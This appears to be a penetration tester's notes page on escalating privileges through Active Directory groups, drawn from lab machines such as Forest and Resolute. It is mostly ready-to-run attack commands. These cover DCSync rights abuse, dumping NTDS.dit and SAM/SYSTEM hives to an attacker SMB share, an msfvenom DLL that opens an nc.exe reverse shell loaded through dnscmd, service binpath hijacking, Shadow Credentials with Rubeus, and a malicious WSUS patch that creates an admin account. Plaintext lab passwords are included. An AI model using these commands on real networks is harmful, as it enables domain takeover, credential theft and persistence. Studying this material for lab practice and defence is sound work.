Privileged Groups

Account Operators

The members of account operators are allowed to create accounts as well as modify non-admin groups.

Get-NetGroupMember -Identity "Account Operators" -Recurse

In this machine I took over of a svc-alfresco with belongs to Account Operators and other nested groups including Exchange Windows Permissions that have WriteNACL permissions against the domain. That means that I can add svc-alfresco as member of Exchange Windows Permission and then perform the DCSync attack to dump the NTDS.dit.

Import-Module .\\PowerView.ps1
Add-ADGroupMember -Identity "EXCHANGE WINDOWS PERMISSIONS" -Members svc-alfresco;
$SecPassword = ConvertTo-SecureString 's3rvice' -AsPlainText -Force;
$Cred = New-Object System.Management.Automation.PSCredential('HTB\\svc-alfresco', $SecPassword);
Add-DomainObjectAcl -Credential $Cred -TargetIdentity "HTB.LOCAL\\Domain Admins" -Identity 'svc-alfresco' -Rights DCSync

Example: Forest

Backup Operators

SeBackupPrivilege/SeBackupPrivilegeCmdLets/bin/Debug at master · giuliano108/SeBackupPrivilege

To convert the script to acceptable windows format run: unix2dos diskshadow.txt

#FindWriteable directories
accesschk.exe -w -s -u <username> C:\\

set context persistent nowriters
set metadata c:\\windows\\system32\\spool\\drivers\\color\\example.cab
set verbose on
begin backup
add volume c: alias mydrive

create

expose %mydrive% w:
end backup

To leverage these privileges locally, the following steps are employed:

#Import necessary libraries:
Import-Module .\\SeBackupPrivilegeUtils.dll
Import-Module .\\SeBackupPrivilegeCmdLets.dll

#Enable the seBackupPrivilege
Set-SeBackupPrivilege
Get-SeBackupPrivilege
diskshadow /s diskshadow.txt

Copy-FileSeBackupPrivilege w:\\windows\\NTDS\\ntds.dit ntds.dit -Overwrite
reg save HKLM\\SAM SAM
reg save HKLM\\SYSTEM SYSTEM

To dump the NTDS

impacket-secretsdump -sam SAM -ntds ntds.dit -system SYSTEM local

Alternative

*Evil-WinRM* PS C:\\programdata\\temp> robocopy /b C:\\users\\administrator\\desktop C:\\programdata\\temp

Dump SAM/SYSTEM/SECURITY files from registry hive

Tool: https://github.com/mpgn/BackupOperatorToDA

Dump Registry hives with BackupOperatorToDa

PS C:\> .\BackupOperatorToDA.exe -t \\lusdc.lustrous.vl -u tony.ward -p U_cPVQqEI50i1X -d lustrous.vl -o \\10.8.5.48\smbfolder\

Dump Registry hives with Impacket

#Dump one at time.
impacket-reg lustrous.vl/Tony.Ward:'U_cPVQqEI50i1X'@10.10.173.213 save -keyName 'HKLM\SAM' -o '\\10.8.5.48\smbfolder'  2>/dev/null
impacket-reg lustrous.vl/Tony.Ward:'U_cPVQqEI50i1X'@10.10.173.213 save -keyName 'HKLM\SYSTEM' -o '\\10.8.5.48\smbfolder'  2>/dev/null
impacket-reg lustrous.vl/Tony.Ward:'U_cPVQqEI50i1X'@10.10.173.213 save -keyName 'HKLM\SECURITY' -o '\\10.8.5.48\smbfolder'  2>/dev/null

#Dump All
impacket-reg lustrous.vl/Tony.Ward:'U_cPVQqEI50i1X'@10.10.173.213 backup -o '\\10.8.5.48\smbfolder' 2>/dev/null

AD Recycle Bin

Get-ADObject -filter 'isDeleted -eq $true' -includeDeletedObjects -Properties *

Example: Cascade

DNSAdmin

The penetration tester discovered that the user ryan was a member of the DnsAdmins group, granting permissions to configure DNS Server settings. This misconfiguration was exploited to escalate privileges to Domain Administrator.

Steps Taken:

1. Payload Creation

   A malicious DLL was generated using msfvenom to establish a reverse shell:

   msfvenom -p windows/x64/exec cmd='\\\\10.10.14.5\\smbfolder\\nc.exe -e cmd.exe 10.10.14.5 1234' -f dll -o shell.dll
   

2. DLL Injection

   The malicious DLL was injected into the DNS Server configuration:

   *Evil-WinRM* PS C:\\Users\\ryan\\Documents> dnscmd Resolute /config /serverlevelplugindll \\\\10.10.14.5\\smbfolder\\shell.dll
   

3. Service Restart

   Restarting the DNS service triggered the payload execution:

   cmd /c "sc.exe stop dns"; cmd /c "sc.exe start dns"
   

4. Privilege Escalation

   The payload executed successfully, granting Domain Administrator privileges.

Evidence:

Example: Resolute

Servers Operators

#Find Services full controll
reg query "HKLM\\SYSTEM\\CurrentControlSet\\Services" /s | findstr /i "ImagePath" | findstr /v "C:\\Windows\\"

#Check Permisiosn
Get-Acl 'C:\\Program Files (x86)\\Microsoft SQL Server\\90\\Shared\\sqlbrowser.exe' | Format-List
icacls 'C:\\Program Files (x86)\\Microsoft SQL Server\\90\\Shared\\sqlbrowser.exe'

C:\\htb> sc query sqlbrowser
C:\\htb> sc config <ServiceName> binpath='COMMAND-HERE'
C:\\htb> sc stop sqlbrowser
C:\\htb> sc start sqlbrowser

#Enable Service
#If you get: The service cannot be started, either because it is disabled or because it has no enabled devices associated with it. (START_TYPE : 4 DISABLED)
C:\\htb> cmd /c sc config sqlbrowser start=auto

Example: MultiMaster

Account Operators

Account Operators, Members can modify non-protected accounts and groups in the domain.

PS C:\Tools> Import-Module .\PowerView.ps1
PS C:\Tools> $SecPassword = ConvertTo-SecureString 'Welcome123!' -AsPlainText -Force
PS C:\Tools> New-DomainUser -Domain domain.local -SamAccountName Intrusionz3r0 -AccountPassword $SecPassword

Enterprise Key Admins

Enterprise Key Admins, Members have the ability to write to the “msds-KeyCredentialLink” property on a user or computer. Writing to this property allows an attacker to create “Shadow Credentials” on the object and authenticate as the principal using kerberos PKINIT.

Case 1 : User has GenericAll over Enterprise Key Admins.

#Get TGT ticket
PS C:\Tools> .\Rubeus.exe asktgt /user:sentinal /password:sentinal /ptt

#Add yourself or any user to the Enterprise Key Admins
PS C:\Tools> Add-DomainGroupMember -identity 'Enterprise Key Admins' -Members 'DEV\sentinal' -Domain inlanefreight.ad -Verbose

#Adding Credentials on the msDS-KeyCredentialLink Attribute
PS C:\Tools> .\Whisker.exe add /target:DC01$ /domain:inlanefreight.ad

#Requesting TGT for DC01$ and retrieving NT hash
PS C:\Tools> .\Rubeus.exe asktgt /user:DC01$ /certificate:MIIJuAIBA<SNIP>" /domain:inlanefreight.ad /dc:DC01.INLANEFREIGHT.AD /getcredentials /show

#Performing S4U2self Request to Impersonate Administrator
PS C:\Tools> .\Rubeus.exe s4u /dc:DC01.inlanefreight.ad /ticket:doIGbDCCB<SNIP> /impersonateuser:administrator@inlanefreight.ad /ptt /self /service:host/DC01.inlanefreight.ad /altservice:cifs/DC01.inlanefreight.ad

WSU Administrator

Introducing SharpWSUSLRQA

PsExec - SysinternalsMicrosoftLearn

#Create the malicious patch
PS C:\> SharpWSUS.exe create /payload:"C:\Users\ben\Documents\pk\psexec.exe" /args:"-accepteula -s -d cmd.exe /c \"net user WSUSDemo Password123! /add && net localgroup administrators WSUSDemo /add\"" /title:"WSUSDemo"

#Aprove the malicious Patch
PS C:\> SharpWSUS.exe approve /updateid:5d667dfd-c8f0-484d-8835-59138ac0e127 /computername:bloredc2.blorebank.local /groupname:"Demo Group"

#Check the Patch status
PS C:\> SharpWSUS.exe check /updateid:5d667dfd-c8f0-484d-8835-59138ac0e127 /computername:bloredc2.blorebank.local”

#Wait a couple minutes

• Default Administrators, Domain Admins and Enterprise Admins "super" groups.

• Server Operators, Members are allowed to log onto DCs locally and can modify services, access SMB shares, and backup files.

• Backup Operators, Members are allowed to log onto DCs locally and should be considered Domain Admins. They can make shadow copies of the SAM/NTDS database, read the registry remotely, and access the file system on the DC via SMB. This group is sometimes added to the local Backup Operators group on non-DCs.

• Print Operators, Members are allowed to logon to DCs locally and "trick" Windows into loading a malicious driver.

• Hyper-V Administrators, If there are virtual DCs, any virtualization admins, such as members of Hyper-V Administrators, should be considered Domain Admins.

• Account Operators, Members can modify non-protected accounts and groups in the domain.

• Remote Desktop Users, Members are not given any useful permissions by default but are often granted additional rights such as Allow Login Through Remote Desktop Services and can move laterally using the RDP protocol.

• Remote Management Users, Members are allowed to logon to DCs with PSRemoting (This group is sometimes added to the local remote management group on non-DCs).

• Group Policy Creator Owners, Members can create new GPOs but would need to be delegated additional permissions to link GPOs to a container such as a domain or OU.

• Schema Admins, Members can modify the Active Directory schema structure and can backdoor any to-be-created Group/GPO by adding a compromised account to the default object ACL.

• DNS Admins, Members have the ability to load a DLL on a DC but do not have the necessary permissions to restart the DNS server. They can load a malicious DLL and wait for a reboot as a persistence mechanism. Loading a DLL will often result in the service crashing. A more reliable way to exploit this group is to create a WPAD record.

• Enterprise Key Admins, Members have the ability to write to the “msds-KeyCredentialLink” property on a user or computer. Writing to this property allows an attacker to create “Shadow Credentials” on the object and authenticate as the principal using kerberos PKINIT.